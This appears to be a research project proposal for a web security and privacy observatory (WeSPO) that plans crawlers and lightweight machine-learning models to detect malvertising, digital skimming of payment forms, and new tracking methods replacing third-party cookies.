Originally conceived over three decades ago as a network of interlinked documents, the web today has evolved into a platform for a diverse array of applications. The ubiquitous presence of the web in everyday activities, ranging from social networking to online banking, has led to a new suite of challenges related to privacy, security and autonomy.
Online tracking
The issue of online tracking, which involves monitoring individuals' browsing behavior across various websites, has attracted scrutiny from researchers, policymakers, and the broader public. Investigations have found that websites revealing individuals' religious beliefs, health conditions or political affiliations shared data with third parties that engage in unconsented and surreptitious profiling. Personal and sensitive data of unsuspecting users are bought and sold by data brokers with minimal accountability and oversight.
Malvertising
Today, online tracking and advertising is going through a fundamental change with the phase-out of third-party cookies by the end of 2024. The new proposals that will replace third-party cookies only received limited attention from privacy and security researchers, leaving potential vulnerabilities and intrusive practices unaddressed. Moreover, advertising networks including Google were repeatedly found to distribute malicious software: a practice known as malvertising.
Lack of continuous monitoring allows these attacks and violations to remain undetected for extensive periods. Even notorious ransomware groups reportedly started using malvertising to infect enterprises by running fake advertisements for software used by enterprises. Unsuspecting employees who trust Google with their searches may download a backdoored binary, which may then steal the victim’s credentials or infect its employer’s network for a ransomware attack.
Digital skimming
Web users are also vulnerable to threats from malicious actors that try to steal private and financial information through a technique called digital skimming attacks. In these attacks, malicious actors compromise online stores or third-party vendors integrated with those stores (known as a supply-chain attack) to inject information-stealing JavaScript code. When a user fills in a login or payment form on a compromised site, the malicious code captures and exfiltrates the password or credit card details, along with other personal information. In 2018, this very attack was used to steal the credit card details of 380,000 victims who used the British Airways’ website. Thousands of other websites were compromised using similar methods since then.
Research goals
Empirical research on web privacy and security rely on large-scale crawls to detect intrusive tracking mechanisms and web-based security threats. Uncovering such threats help address vulnerabilities, prevent further exploitation, raise public awareness, and inform policy-making. However, detecting web-based security threats at scale is challenging, requiring realistic user simulation, dynamic analysis, and deep instrumentation that can cope with obfuscated and evasive JavaScript code. The goal of this project is to contribute tools, methods and data to help address these challenges by harnessing the recent advances in machine learning and browser automation.
The primary goal of the WeSPO is to contribute tools, methods and datasets to detect privacy and security threats from malvertising, digital skimming attacks and novel forms of online tracking.
Scientific and technical challenges
Malicious actors use evasive cloaking methods including commercial anti-bot products and client-side browser fingerprinting to evade detection by security scanners. JavaScript, the programming language of the web, is notoriously difficult to analyze due to code obfuscation and language features such as dynamic code generation, closures and dynamic typing. Moreover, websites get updated, personalized, and localized, making it difficult to reproduce results from prior studies, even when the detailed methods and code are made available. State-of-the-art forensics-focused projects such as WebRR made it only recently possible to record and replay web-based attacks, but their overhead is still prohibitive for large-scale measurements and they do not provide complete determinism. Maintaining such projects is also a significant challenge, since they require modifications to the browser’s JavaScript engine which may break with updates.
Realistic simulation of user interactions also poses several challenges: for instance, to analyze the checkout form of a website, the crawler needs to perform a series of interactions in a specific order. These tasks are easy for a human, but are difficult for an automated software that is required for large-scale studies.
Finally, the sheer scale of the advertisements displayed every day pose another challenge for detecting malvertising campaigns. Efficiently detecting such campaigns requires careful consideration of methods. Overall, WeSPO will follow a pragmatic and targeted approach to tackle these challenges, which we describe below.
Key objectives
Key objective 1: Efficient and early detection of malvertising campaigns
A key objective of the study is to continuously detect and report malvertising campaigns. Detecting such campaigns pose two main challenges: evasive cloaking by malvertisers and the sheer scale of advertisements in circulation. A key idea to tackle these two challenges at the same time is to use platform ad libraries to minimize contact with the malvertiser’s online properties. Thanks to regulations such as the EU Digital Services Act, large tech platforms such as Google and Facebook are required to publish the advertisements they distribute. These extensive datasets are accessible through APIs, offering a rich resource for analysis. For instance, Google's dataset reveals that approximately 343,000 ads from 46,000 unique advertisers are launched daily within the European Economic Area (EEA) and Turkey alone, two regions covered by Google's disclosures. Narrowing the focus to three relevant ad categories—Software, Computers & Consumer Electronics, and Mobile App Utilities—significantly reduces the new daily ads to around 20,000 (median). This manageable subset will be further refined by prioritizing ads from lesser-known advertisers, considering both the number of impressions and distinct ad counts. Since some malvertising campaigns used hijacked advertiser accounts, the strategy will include sampling advertisements from all advertisers in the pertinent ad categories.
Key Objective 2: Detect Digital Skimming Attack with a Focus on E-commerce Websites
This key objective is dedicated to developing a tool for identifying digital skimming attacks, which have historically affected thousands of e-commerce sites by stealing credit card and personal data. We will focus on e-commerce websites and login forms of top 100K websites. To efficiently identify web skimmer scripts, we will deploy an interactive crawler that mimics the actions of a user completing a purchase. This process is challenging due to the diversity of website designs and purchase flows. We will train lightweight ML models to detect common elements such as add-to-cart and checkout buttons. Recent multimodal models such as GPT4-Vision are already used in open-source projects to build ML-guided crawlers. These tools work by submitting the page screenshot and a simplified DOM tree to the model, while prompting it with the task at hand (e.g., “What button I should click next to book a plane ticket from X to Y”). Unfortunately, these models are costly and energy intensive. In Senol et al., the PI has successfully used lightweight pre-trained Mozilla Fathom models to identify 76% more email fields than regular input field type matching. The PI’s PhD student Senol then collaborated with Google researchers to build highly accurate classifiers that detect login pages. Different from this work, we will focus on underutilized accessibility labels in combination with distilled (i.e., lightweight) multilingual language models such as MiniLM. For gathering training data to construct models, we will employ Playwright's codegen feature, which records accessibility selectors and user interactions during a manual website visit. A side objective will be to evaluate and improve the pre-trained models used in Firefox and other mainstream browsers to detect password fields, credit card forms and other autofill elements. To do so, we will seek collaboration with Mozilla developers, who already supported the applicant by giving access to private models that are still in development.
Key objective 3: Set up a Web Security and Privacy Observatory (WeSPO)
Web archives and crawl datasets such as the Wayback Machine, CommonCrawl and HTTP Archive have crucial limitations for web measurement research. The limitations include passive crawling (i.e. no interaction with the page), having incomplete third-party coverage, and Wayback escapes–i.e. loading of unarchived content from live websites. Further, these archives and datasets are based on crawls from the US, or unknown locations.
To address this data gap, the project will establish a Web Privacy and Security Observatory (WeSPO) that conducts quarterly web privacy measurement crawls of the top 100,000 websites from the CrUX list. Unlike key objectives 1 and 2, WeSPO crawls will focus on the evolving landscape of tracking mechanisms following the impending phaseout of third-party cookies. In addition to well-known cookieless tracking mechanisms such as browser fingerprinting, the crawls will focus on potential misuse of Topics and Protected Audience APIs — two (re)targeted advertising Privacy Sandbox APIs that are poised to replace cookies. Potential misuses include sharing users’ topics (interests) between origins, and adding the users to interest groups that act as opaque proxy variables for sensitive traits.